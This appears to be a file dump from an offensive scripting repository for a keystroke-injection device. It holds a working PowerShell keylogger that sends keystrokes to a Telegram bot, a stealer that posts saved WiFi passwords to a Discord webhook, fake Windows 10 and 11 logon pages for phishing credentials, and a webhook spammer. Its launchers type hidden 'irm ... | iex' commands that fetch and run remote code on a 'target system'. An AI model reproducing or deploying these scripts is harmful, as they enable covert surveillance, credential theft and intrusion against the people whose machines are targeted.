/Fast-Execution/Telegram-Keylogger/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Keylogger To Telegram Chat

3 | 4 | SYNOPSIS 5 | 6 | This script connects target computer with a telegram chat to capture keystrokes. 7 | 8 | SETUP INSTRUCTIONS 9 | 10 | 1. visit https://t.me/botfather and make a bot. 11 | 2. add bot api to script. 12 | 3. search for bot in top left box in telegram and start a chat then type /start. 13 | 5. Run Script on target System 14 | -------------------------------------------------------------------------------- /Fast-Execution/Telegram-Keylogger/main.ps1: -------------------------------------------------------------------------------- 1 | $Token = "$tg" 2 | $PassPhrase = "$env:COMPUTERNAME" 3 | $URL='https://api.telegram.org/bot{0}' -f $Token 4 | while($chatID.length -eq 0){ 5 | $updates = Invoke-RestMethod -Uri ($url + "/getUpdates") 6 | if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1] 7 | if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}} 8 | Sleep 10 9 | } 10 | 11 | Function KeyCapture { 12 | $MessageToSend = New-Object psobject 13 | $MessageToSend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID 14 | $MessageToSend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$env:COMPUTERNAME : KeyCapture Started." -Force 15 | irm -Method Post -Uri ($URL +'/sendMessage') -Body ($MessageToSend | ConvertTo-Json) -ContentType "application/json" 16 | $API = '[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); [DllImport("user32.dll", CharSet=CharSet.Auto)]public static extern int GetKeyboardState(byte[] keystate);[DllImport("user32.dll", CharSet=CharSet.Auto)]public static extern int MapVirtualKey(uint uCode, int uMapType);[DllImport("user32.dll", CharSet=CharSet.Auto)]public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);' 17 | $API = Add-Type -MemberDefinition $API -Name 'Win32' -Namespace API -PassThru 18 | $LastKeypressTime = [System.Diagnostics.Stopwatch]::StartNew() 19 | $KeypressThreshold = [TimeSpan]::FromSeconds(10) 20 | While ($true){ 21 | $keyPressed = $false 22 | try{ 23 | while ($LastKeypressTime.Elapsed -lt $KeypressThreshold) { 24 | Start-Sleep -Milliseconds 30 25 | for ($asc = 8; $asc -le 254; $asc++){ 26 | $keyst = $API::GetAsyncKeyState($asc) 27 | if ($keyst -eq -32767) { 28 | $keyPressed = $true 29 | $LastKeypressTime.Restart() 30 | $null = [console]::CapsLock 31 | $vtkey = $API::MapVirtualKey($asc, 3) 32 | $kbst = New-Object Byte[] 256 33 | $checkkbst = $API::GetKeyboardState($kbst) 34 | $logchar = New-Object -TypeName System.Text.StringBuilder 35 | if ($API::ToUnicode($asc, $vtkey, $kbst, $logchar, $logchar.Capacity, 0)) { 36 | $LString = $logchar.ToString() 37 | if ($asc -eq 8) {$LString = "[BKSP]"} 38 | if ($asc -eq 13) {$LString = "[ENT]"} 39 | if ($asc -eq 27) {$LString = "[ESC]"} 40 | $nosave += $LString 41 | }}}}} 42 | finally{ 43 | If ($keyPressed) { 44 | $escmsgsys = $nosave -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} 45 | $timestamp = Get-Date -Format "dd-MM-yyyy HH:mm:ss" 46 | $escmsg = "Keys Captured : "+$escmsgsys 47 | $MessageToSend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$escmsg" -Force 48 | irm -Method Post -Uri ($URL +'/sendMessage') -Body ($MessageToSend | ConvertTo-Json) -ContentType "application/json" 49 | $keyPressed = $false 50 | $nosave = "" 51 | } 52 | } 53 | $LastKeypressTime.Restart() 54 | Start-Sleep -Milliseconds 10 55 | } 56 | } 57 | -------------------------------------------------------------------------------- /Fast-Execution/US-Keyboard-Layout/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Set US Keyboard Layout

3 | 4 | SYNOPSIS 5 | 6 | This script changes the keyboard layout and system language to US. 7 | 8 | USAGE 9 | 10 | 1. Run the script on a target system -------------------------------------------------------------------------------- /Fast-Execution/US-Keyboard-Layout/US-Keyboard.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Keyboard Language changer. 2 | // Author: @beigeworm 3 | // Description: This script changes the keyboard layout and system language to US. 4 | // Target: Windows 10 5 | 6 | // script setup 7 | layout("us") 8 | 9 | // Open Powershell and download script 10 | delay(1000); 11 | press("GUI r"); 12 | delay(1000); 13 | type("powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/US-Keyboard-Layout/main.ps1 | iex"); 14 | delay(500); 15 | press("ENTER"); 16 | -------------------------------------------------------------------------------- /Fast-Execution/US-Keyboard-Layout/main.ps1: -------------------------------------------------------------------------------- 1 | Function SetkbUS { 2 | 3 | Dism /online /Get-Intl 4 | Set-WinSystemLocale en-US 5 | Set-WinUserLanguageList en-US -force 6 | 7 | } 8 | 9 | SetkbUS 10 | -------------------------------------------------------------------------------- /Fast-Execution/Wallpaper-Jumpscare/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Simple Wallpaper Changer

3 | 4 | SYNOPSIS 5 | 6 | This script will download an image from the web and set it as the wallpaper. 7 | 8 | USAGE 9 | 10 | 1. Change DIRECT IMAGE LINK HERE to your URL. 11 | 2. Run the script. 12 | -------------------------------------------------------------------------------- /Fast-Execution/Wallpaper-Jumpscare/Wallpaper-Jumpscare.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Wallpaper Jump Scare. 2 | // Author: @beigeworm 3 | // Description: This script changes downlaods a scary image and sets it as a wallpaper. 4 | // Target: Windows 10 5 | 6 | // script setup 7 | layout("us") 8 | 9 | // Open Powershell and download script 10 | delay(1000); 11 | press("GUI r"); 12 | delay(1000); 13 | type("powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Wallpaper-Jumpscare/main.ps1 | iex"); 14 | delay(500); 15 | press("ENTER"); -------------------------------------------------------------------------------- /Fast-Execution/Wallpaper-Jumpscare/main.ps1: -------------------------------------------------------------------------------- 1 | $url = "https://i.ibb.co/XJSPt9s/1.png" 2 | $outputPath = "$env:temp\img.jpg" 3 | $wallpaperStyle = 2 # 0: Tiled, 1: Centered, 2: Stretched 4 | 5 | IWR -Uri $url -OutFile $outputPath 6 | 7 | $signature = @' 8 | using System; 9 | using System.Runtime.InteropServices; 10 | 11 | public class Wallpaper { 12 | [DllImport("user32.dll", CharSet = CharSet.Auto)] 13 | public static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni); 14 | } 15 | '@ 16 | 17 | Add-Type -TypeDefinition $signature 18 | 19 | $SPI_SETDESKWALLPAPER = 0x0014 20 | $SPIF_UPDATEINIFILE = 0x01 21 | $SPIF_SENDCHANGE = 0x02 22 | 23 | [Wallpaper]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $outputPath, $SPIF_UPDATEINIFILE -bor $SPIF_SENDCHANGE) 24 | -------------------------------------------------------------------------------- /Fast-Execution/Webhook-Spammer-GUI/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Discord Spammer With GUI

3 | 4 | SYNOPSIS 5 | 6 | Creates a GUI with functionality to spam a webhook with text or an image. 7 | 8 | USAGE 9 | 10 | 1. Run script with powershell 11 | 2. Input ip Range and select additional parameters 12 | 3. Press "Start Scan" 13 | -------------------------------------------------------------------------------- /Fast-Execution/Webhook-Spammer-GUI/Webhook-Spammer-GUI.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Webhook Spammer GUI Tool. 2 | // Author: @beigeworm 3 | // Description: This script creates a GUI for Spamming a webhook with text or an image. 4 | // Target: Windows 10 5 | 6 | // script setup 7 | layout("us") 8 | 9 | // Open Powershell and download script 10 | delay(1000); 11 | press("GUI r"); 12 | delay(1000); 13 | type("powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Webhook-Spammer-GUI/main.ps1 | iex"); 14 | delay(500); 15 | press("ENTER"); 16 | -------------------------------------------------------------------------------- /Fast-Execution/Webhook-Spammer-GUI/main.ps1: -------------------------------------------------------------------------------- 1 | Add-Type -AssemblyName System.Windows.Forms 2 | Add-Type -AssemblyName System.Drawing 3 | Add-Type -AssemblyName Microsoft.VisualBasic 4 | [System.Windows.Forms.Application]::EnableVisualStyles() 5 | 6 | $tooltip1 = New-Object System.Windows.Forms.ToolTip 7 | $ShowHelp={ 8 | Switch ($this.name) { 9 | 10 | 11 | "start" {$tip = "Start Spamming!"} 12 | 13 | "image" {$tip = "Select an Image"} 14 | 15 | "url" {$tip = "Input Discord Webhook URL"} 16 | 17 | "message" {$tip = "Input Message Here"} 18 | 19 | "imgpath" {$tip = "Path to your Image"} 20 | 21 | "delay" {$tip = "Delay Between Sending"} 22 | 23 | "amount" {$tip = "Amount of Messages to Send"} 24 | } 25 | $tooltip1.SetToolTip($this,$tip) 26 | } 27 | 28 | $MainWindow = New-Object System.Windows.Forms.Form 29 | $MainWindow.ClientSize = '435,300' 30 | $MainWindow.Text = "| BeigeTools | Webhook Spammer |" 31 | $MainWindow.BackColor = "#242424" 32 | $MainWindow.Opacity = 1 33 | $MainWindow.TopMost = $true 34 | $MainWindow.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon("C:\Windows\System32\DevicePairingWizard.exe") 35 | 36 | $StartSpam = New-Object System.Windows.Forms.Button 37 | $StartSpam.Text = "Start" 38 | $StartSpam.Width = 80 39 | $StartSpam.Height = 25 40 | $StartSpam.Location = New-Object System.Drawing.Point(340, 263) 41 | $StartSpam.Font = 'Microsoft Sans Serif,8,style=Bold' 42 | $StartSpam.BackColor = "#eeeeee" 43 | $StartSpam.add_MouseHover($showhelp) 44 | $StartSpam.name="start" 45 | 46 | $selimage = New-Object System.Windows.Forms.Button 47 | $selimage.Text = "Browse" 48 | $selimage.Width = 80 49 | $selimage.Height = 25 50 | $selimage.Location = New-Object System.Drawing.Point(245, 263) 51 | $selimage.Font = 'Microsoft Sans Serif,8,style=Bold' 52 | $selimage.BackColor = "#eeeeee" 53 | $selimage.add_MouseHover($showhelp) 54 | $selimage.name="image" 55 | 56 | $URLboxInputHeader = New-Object System.Windows.Forms.Label 57 | $URLboxInputHeader.Text = "Discord Webhook URL" 58 | $URLboxInputHeader.ForeColor = "#bcbcbc" 59 | $URLboxInputHeader.AutoSize = $true 60 | $URLboxInputHeader.Width = 25 61 | $URLboxInputHeader.Height = 10 62 | $URLboxInputHeader.Location = New-Object System.Drawing.Point(15, 15) 63 | $URLboxInputHeader.Font = 'Microsoft Sans Serif,8,style=Bold' 64 | 65 | $URLboxInput = New-Object System.Windows.Forms.TextBox 66 | $URLboxInput.Location = New-Object System.Drawing.Point(20, 35) 67 | $URLboxInput.BackColor = "#eeeeee" 68 | $URLboxInput.Width = 400 69 | $URLboxInput.Height = 40 70 | $URLboxInput.Text = "https://discord.com/api/webhooks/..." 71 | $URLboxInput.Multiline = $false 72 | $URLboxInput.Font = 'Microsoft Sans Serif,8,style=Bold' 73 | $URLboxInput.add_MouseHover($showhelp) 74 | $URLboxInput.name="url" 75 | 76 | $TextboxInputHeader = New-Object System.Windows.Forms.Label 77 | $TextboxInputHeader.Text = "Message Content" 78 | $TextboxInputHeader.ForeColor = "#bcbcbc" 79 | $TextboxInputHeader.AutoSize = $true 80 | $TextboxInputHeader.Width = 25 81 | $TextboxInputHeader.Height = 10 82 | $TextboxInputHeader.Location = New-Object System.Drawing.Point(15, 63) 83 | $TextboxInputHeader.Font = 'Microsoft Sans Serif,8,style=Bold' 84 | 85 | $TextBoxInput = New-Object System.Windows.Forms.TextBox 86 | $TextBoxInput.Location = New-Object System.Drawing.Point(20, 83) 87 | $TextBoxInput.BackColor = "#eeeeee" 88 | $TextBoxInput.Width = 400 89 | $TextBoxInput.Height = 110 90 | $TextBoxInput.Text = "" 91 | $TextBoxInput.Multiline = $true 92 | $TextBoxInput.Font = 'Microsoft Sans Serif,8,style=Bold' 93 | $TextBoxInput.add_MouseHover($showhelp) 94 | $TextBoxInput.name="message" 95 | 96 | $ImageInputHeader = New-Object System.Windows.Forms.Label 97 | $ImageInputHeader.Text = "Image Path" 98 | $ImageInputHeader.ForeColor = "#bcbcbc" 99 | $ImageInputHeader.AutoSize = $true 100 | $ImageInputHeader.Width = 25 101 | $ImageInputHeader.Height = 10 102 | $ImageInputHeader.Location = New-Object System.Drawing.Point(15, 200) 103 | $ImageInputHeader.Font = 'Microsoft Sans Serif,8,style=Bold' 104 | 105 | $ImageInput = New-Object System.Windows.Forms.TextBox 106 | $ImageInput.Location = New-Object System.Drawing.Point(20, 220) 107 | $ImageInput.BackColor = "#eeeeee" 108 | $ImageInput.Width = 400 109 | $ImageInput.Height = 20 110 | $ImageInput.Text = "" 111 | $ImageInput.Multiline = $true 112 | $ImageInput.Font = 'Microsoft Sans Serif,8,style=Bold' 113 | $ImageInput.add_MouseHover($showhelp) 114 | $ImageInput.name="imgpath" 115 | 116 | $coolboxInputHeader = New-Object System.Windows.Forms.Label 117 | $coolboxInputHeader.Text = "Cooldown" 118 | $coolboxInputHeader.ForeColor = "#bcbcbc" 119 | $coolboxInputHeader.AutoSize = $true 120 | $coolboxInputHeader.Width = 25 121 | $coolboxInputHeader.Height = 10 122 | $coolboxInputHeader.Location = New-Object System.Drawing.Point(115, 245) 123 | $coolboxInputHeader.Font = 'Microsoft Sans Serif,8,style=Bold' 124 | 125 | $coolboxInput = New-Object System.Windows.Forms.TextBox 126 | $coolboxInput.Location = New-Object System.Drawing.Point(120, 265) 127 | $coolboxInput.BackColor = "#eeeeee" 128 | $coolboxInput.Width = 60 129 | $coolboxInput.Height = 40 130 | $coolboxInput.Text = "700" 131 | $coolboxInput.Multiline = $false 132 | $coolboxInput.Font = 'Microsoft Sans Serif,8,style=Bold' 133 | $coolboxInput.add_MouseHover($showhelp) 134 | $coolboxInput.name="delay" 135 | 136 | $amtboxInputHeader = New-Object System.Windows.Forms.Label 137 | $amtboxInputHeader.Text = "Amount" 138 | $amtboxInputHeader.ForeColor = "#bcbcbc" 139 | $amtboxInputHeader.AutoSize = $true 140 | $amtboxInputHeader.Width = 25 141 | $amtboxInputHeader.Height = 10 142 | $amtboxInputHeader.Location = New-Object System.Drawing.Point(15, 245) 143 | $amtboxInputHeader.Font = 'Microsoft Sans Serif,8,style=Bold' 144 | 145 | $amtBoxInput = New-Object System.Windows.Forms.TextBox 146 | $amtBoxInput.Location = New-Object System.Drawing.Point(20, 265) 147 | $amtBoxInput.BackColor = "#eeeeee" 148 | $amtBoxInput.Width = 60 149 | $amtBoxInput.Height = 40 150 | $amtBoxInput.Text = "100" 151 | $amtBoxInput.Multiline = $false 152 | $amtBoxInput.Font = 'Microsoft Sans Serif,8,style=Bold' 153 | $amtBoxInput.add_MouseHover($showhelp) 154 | $amtBoxInput.name="amount" 155 | 156 | $mstext = New-Object System.Windows.Forms.Label 157 | $mstext.Text = "ms" 158 | $mstext.ForeColor = "#bcbcbc" 159 | $mstext.AutoSize = $true 160 | $mstext.Width = 25 161 | $mstext.Height = 10 162 | $mstext.Location = New-Object System.Drawing.Point(185, 268) 163 | $mstext.Font = 'Microsoft Sans Serif,8,style=Bold' 164 | 165 | #==================================================== Define GUI Elements ========================================================== 166 | 167 | $MainWindow.controls.AddRange(@($StartSpam, $ImageInput, $ImageInputHeader, $selimage, $URLBoxInput, $URLBoxInputHeader, $TextBoxInput, $coolboxInput, $amtBoxInput, $TextboxInputHeader, $coolboxInputHeader, $amtboxInputHeader, $mstext)) 168 | 169 | #==================================================== Click Functions ========================================================== 170 | 171 | $StartSpam.Add_Click({ 172 | 173 | $hookurl = $URLBoxInput.Text 174 | $n = [int]$amtBoxInput.Text 175 | $c = [int]$coolBoxInput.Text 176 | $i = 0 177 | 178 | while($i -lt $n) { 179 | $msgsys = $TextboxInput.Text 180 | $escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} 181 | $jsonsys = @{"username" = "Spammer" ;"content" = $escmsgsys} | ConvertTo-Json 182 | Start-Sleep -Milliseconds $c 183 | Invoke-RestMethod -Uri $hookurl -Method Post -ContentType "application/json" -Body $jsonsys 184 | $i++ 185 | } 186 | 187 | $imageBytes = [System.IO.File]::ReadAllBytes($ImageInput.Text) 188 | $b64 = [System.Convert]::ToBase64String($imageBytes) 189 | $decodedFile = [System.Convert]::FromBase64String($b64) 190 | $File = "$env:temp\bl.png" 191 | Set-Content -Path $File -Value $decodedFile -Encoding Byte 192 | 193 | while($i -lt $n) { 194 | curl.exe -F "file1=@$file" $hookurl 195 | $i++ 196 | } 197 | 198 | Remove-Item -Path $file -Force 199 | }) 200 | 201 | 202 | $selimage.Add_Click({ 203 | 204 | $FileDialog = New-Object Windows.Forms.OpenFileDialog 205 | $FileDialog.Filter = "All Files (*.*)|*.*" 206 | 207 | if ($FileDialog.ShowDialog() -eq [Windows.Forms.DialogResult]::OK) { 208 | $SelectedFilePath = $FileDialog.FileName 209 | $ImageInput.Text = $SelectedFilePath 210 | } 211 | 212 | }) 213 | 214 | $MainWindow.ShowDialog() | Out-Null 215 | exit 216 | -------------------------------------------------------------------------------- /Fast-Execution/Wifi-Networks-to-Discord/Discord-WiFi-Grabber.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's saved WiFi to Discord Webhook. 2 | // Author: @beigeworm 3 | // Description: This script collects saved WiFi info and posts results to a discord webhook. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 7 | 8 | // script setup 9 | layout("us") 10 | 11 | // Open Powershell and download script 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_wifi_to_dc | iex"); 16 | delay(500); 17 | press("ENTER"); -------------------------------------------------------------------------------- /Fast-Execution/Wifi-Networks-to-Discord/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Saved Wifi Networks to Discord

3 | 4 | SYNOPSIS 5 | 6 | This script gathers WiFi information and posts to a discord webhook address with the results. 7 | 8 | USAGE 9 | 10 | 1. Input your credentials below 11 | 2. Run Script on target System 12 | 3. Check Discord for results 13 | 14 | -------------------------------------------------------------------------------- /Fast-Execution/Wifi-Networks-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | $whuri = "$dc" 2 | $outfile="" 3 | $a=0 4 | $ws=(netsh wlan show profiles) -replace ".*:\s+" 5 | foreach($s in $ws){ 6 | if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "" -And $s.length -gt 5){ 7 | $ssid=$s.Trim() 8 | if($s -Match ":"){ 9 | $ssid=$s.Split(":")[1].Trim() 10 | } 11 | $pw=(netsh wlan show profiles name=$ssid key=clear) 12 | $pass="None" 13 | foreach($p in $pw){ 14 | if($p -Match "Key Content"){ 15 | $pass=$p.Split(":")[1].Trim() 16 | $outfile+="SSID: $ssid : Password: $pass`n" 17 | } 18 | } 19 | } 20 | $a++ 21 | } 22 | 23 | $outfile | Out-File -FilePath "$env:temp\info.txt" -Encoding ASCII -Append 24 | 25 | $Pathsys = "$env:temp\info.txt" 26 | $msgsys = Get-Content -Path $Pathsys -Raw 27 | $escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} 28 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json 29 | Start-Sleep 1 30 | Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $jsonsys 31 | Remove-Item -Path $Pathsys -force 32 | -------------------------------------------------------------------------------- /Fast-Execution/Win10-Phishing/Fake-Windows-10-Logon.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Fake Windows Logon Screen to Discord Webhook. 2 | // Author: @beigeworm 3 | // Description: This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 7 | 8 | // script setup 9 | layout("us") 10 | 11 | // Open Powershell and download script 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_win10_to_dc | iex"); 16 | delay(500); 17 | press("ENTER"); -------------------------------------------------------------------------------- /Fast-Execution/Win10-Phishing/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Fake Windows Logon Screen to Discord Webhook

3 | 4 | 5 | SYNOPSIS 6 | 7 | This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook. 8 | 9 | USAGE 10 | 11 | 1. Replace YOUR_WEBBHOOK_HERE with your webhook. 12 | 2. Run script on target system. 13 | -------------------------------------------------------------------------------- /Fast-Execution/Win10-Phishing/main.ps1: -------------------------------------------------------------------------------- 1 | # GATHER SYSTEM AND USER INFO 2 | $u = (Get-WmiObject Win32_UserAccount -Filter "Name = '$Env:UserName'").FullName 3 | $c = $env:COMPUTERNAME 4 | $wpURL = "https://wallpapercave.com/wp/wp1809099.jpg" 5 | 6 | # DEFAULT LOGIN METHOD 7 | $value = Get-ItemPropertyValue -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\NgcPin" -Name "DeviceLockEnforcementPending" -ErrorAction SilentlyContinue 8 | if ($value -eq 0 -or $value -eq 1) {$mthd = "PIN"} else {$mthd = "Password"} 9 | 10 | # FIND ACCOUNT PICTURES 11 | $accountPicturesPath = "C:\ProgramData\Microsoft\Default Account Pictures" 12 | $imageFiles = Get-ChildItem -Path $accountPicturesPath -include "*.jpg", "*.png", "*.bmp" -File -Recurse 13 | if ($imageFiles.Count -gt 0) { 14 | $firstImage = $imageFiles[0].FullName 15 | $image = [System.Drawing.Image]::FromFile($firstImage) 16 | $usrimg = "$image" 17 | }else {$usrimg = "https://www.tenforums.com/geek/gars/images/2/types/thumb_14400082930User.png"} 18 | 19 | # HTML FOR COVER PAGE 20 | $h = @" 21 | 22 | 23 | 24 | 25 | 26 | 27 |  28 | 29 | 30 | 34 | 35 | 36 |
37 |
38 |
39 |
08:20
40 |
Tuesday, October 8
41 |
42 | 43 | 44 |
45 |
46 |
47 |
48 | 100 | 101 | 102 | "@ 103 | 104 | # HTML FOR LOGIN PAGE 105 | $h2 = @" 106 | 107 | 108 | 109 | 110 | 111 | 112 |  113 | 114 | 191 | 192 | 193 |
194 |
195 |
196 | User Image 197 |
198 |
199 |

$u

200 | 201 | 202 |

I forgot my $mthd

203 |
204 |
205 |
206 | 234 | 235 | 236 | "@ 237 | 238 | # SAVE HTML 239 | $p = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "index.html") 240 | $h | Out-File -Encoding UTF8 -FilePath $p 241 | $a = "file://$p" 242 | $p2 = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "login.html") 243 | $h2 | Out-File -Encoding UTF8 -FilePath $p2 244 | 245 | # KILL ANY BROWSERS (interfere with "Maximazed" argument) 246 | Start-Process -FilePath "taskkill" -ArgumentList "/F", "/IM", "chrome.exe", "/IM", "msedge.exe" -NoNewWindow -Wait 247 | Sleep -Milliseconds 100 248 | 249 | # START EDGE IN FULLSCREEN 250 | $edgeProcess = Start-Process -FilePath "msedge.exe" -ArgumentList "--kiosk --app=$a -WindowStyle Maximized" -PassThru 251 | $edgeProcess.WaitForInputIdle() 252 | 253 | Add-Type @" 254 | using System; 255 | using System.Runtime.InteropServices; 256 | public class Win32 { 257 | [DllImport("user32.dll")] 258 | public static extern IntPtr SetWindowPos(IntPtr hWnd, IntPtr hWndInsertAfter, int X, int Y, int cx, int cy, uint uFlags); 259 | public static readonly IntPtr HWND_TOPMOST = new IntPtr(-1); 260 | public static readonly IntPtr HWND_NOTOPMOST = new IntPtr(-2); 261 | public const uint SWP_NOMOVE = 0x2; 262 | public const uint SWP_NOSIZE = 0x1; 263 | public const uint SWP_SHOWWINDOW = 0x40; 264 | } 265 | "@ 266 | 267 | # SET EDGE AS TOP WINDOW AND START SCREENSAVER 268 | $null = [Win32]::SetWindowPos($edgeProcess.MainWindowHandle, [Win32]::HWND_TOPMOST, 0, 0, 0, 0, [Win32]::SWP_NOMOVE -bor [Win32]::SWP_NOSIZE -bor [Win32]::SWP_SHOWWINDOW) 269 | Sleep -Milliseconds 250 270 | $null = [Win32]::SetWindowPos($edgeProcess.MainWindowHandle, [Win32]::HWND_TOPMOST, 0, 0, 0, 0, [Win32]::SWP_NOMOVE -bor [Win32]::SWP_NOSIZE -bor [Win32]::SWP_SHOWWINDOW) 271 | Sleep -Milliseconds 250 272 | $black = Start-Process -FilePath "C:\Windows\System32\scrnsave.scr" 273 | -------------------------------------------------------------------------------- /Fast-Execution/Win11-Phishing/Fake-Windows-11-Logon.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Fake Windows Logon Screen to Discord Webhook. 2 | // Author: @beigeworm 3 | // Description: This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook. 4 | // Target: Windows 11 5 | // *SETUP* 6 | // replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 7 | 8 | // script setup 9 | layout("us") 10 | 11 | // Open Powershell and download script 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_win11_to_dc | iex"); 16 | delay(500); 17 | press("ENTER"); -------------------------------------------------------------------------------- /Fast-Execution/Win11-Phishing/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Fake Windows Logon Screen to Discord Webhook

3 | 4 | 5 | SYNOPSIS 6 | 7 | This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook. 8 | 9 | USAGE 10 | 11 | 1. Replace YOUR_WEBBHOOK_HERE with your webhook. 12 | 2. Run script on target system. 13 | -------------------------------------------------------------------------------- /Fast-Execution/Win11-Phishing/main.ps1: -------------------------------------------------------------------------------- 1 | # GATHER SYSTEM AND USER INFO 2 | $u = (Get-WmiObject Win32_UserAccount -Filter "Name = '$Env:UserName'").FullName 3 | $c = $env:COMPUTERNAME 4 | $wpURL = "https://wallpapercave.com/wp/wp9378862.jpg" 5 | 6 | # DEFAULT LOGIN METHOD 7 | $value = Get-ItemPropertyValue -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\NgcPin" -Name "DeviceLockEnforcementPending" -ErrorAction SilentlyContinue 8 | if ($value -eq 0 -or $value -eq 1) {$mthd = "PIN"} else {$mthd = "Password"} 9 | 10 | # FIND ACCOUNT PICTURES 11 | $accountPicturesPath = "C:\ProgramData\Microsoft\Default Account Pictures" 12 | $imageFiles = Get-ChildItem -Path $accountPicturesPath -include "*.jpg", "*.png", "*.bmp" -File -Recurse 13 | if ($imageFiles.Count -gt 0) { 14 | $firstImage = $imageFiles[0].FullName 15 | $image = [System.Drawing.Image]::FromFile($firstImage) 16 | $usrimg = "$image" 17 | }else {$usrimg = "https://www.tenforums.com/geek/gars/images/2/types/thumb_14400082930User.png"} 18 | 19 | # HTML FOR COVER PAGE 20 | $h = @" 21 | 
08:20
Tuesday, October 8
63 | "@ 64 | 65 | # HTML FOR LOGIN PAGE 66 | $h2 = @" 67 | 68 | 69 | 70 | 71 | 72 | 73 |  74 | 75 | 152 | 153 | 154 |
155 |
156 |
157 | User Image 158 |
159 |
160 |

$u

161 | 162 | 163 |

I forgot my $mthd

164 |
165 |
166 |
167 | 195 | 196 | 197 | "@ 198 | 199 | # SAVE HTML 200 | $p = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "index.html") 201 | $h | Out-File -Encoding UTF8 -FilePath $p 202 | $a = "file://$p" 203 | $p2 = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "login.html") 204 | $h2 | Out-File -Encoding UTF8 -FilePath $p2 205 | 206 | # KILL ANY BROWSERS (interfere with "Maximazed" argument) 207 | Start-Process -FilePath "taskkill" -ArgumentList "/F", "/IM", "chrome.exe", "/IM", "msedge.exe" -NoNewWindow -Wait 208 | Sleep -Milliseconds 100 209 | 210 | # START EDGE IN FULLSCREEN 211 | $edgeProcess = Start-Process -FilePath "msedge.exe" -ArgumentList "--kiosk --app=$a -WindowStyle Maximized" -PassThru 212 | $edgeProcess.WaitForInputIdle() 213 | 214 | Add-Type @" 215 | using System; 216 | using System.Runtime.InteropServices; 217 | public class Win32 { 218 | [DllImport("user32.dll")] 219 | public static extern IntPtr SetWindowPos(IntPtr hWnd, IntPtr hWndInsertAfter, int X, int Y, int cx, int cy, uint uFlags); 220 | public static readonly IntPtr HWND_TOPMOST = new IntPtr(-1); 221 | public static readonly IntPtr HWND_NOTOPMOST = new IntPtr(-2); 222 | public const uint SWP_NOMOVE = 0x2; 223 | public const uint SWP_NOSIZE = 0x1; 224 | public const uint SWP_SHOWWINDOW = 0x40; 225 | } 226 | "@ 227 | 228 | # SET EDGE AS TOP WINDOW AND START SCREENSAVER 229 | $null = [Win32]::SetWindowPos($edgeProcess.MainWindowHandle, [Win32]::HWND_TOPMOST, 0, 0, 0, 0, [Win32]::SWP_NOMOVE -bor [Win32]::SWP_NOSIZE -bor [Win32]::SWP_SHOWWINDOW) 230 | Sleep -Milliseconds 250 231 | $null = 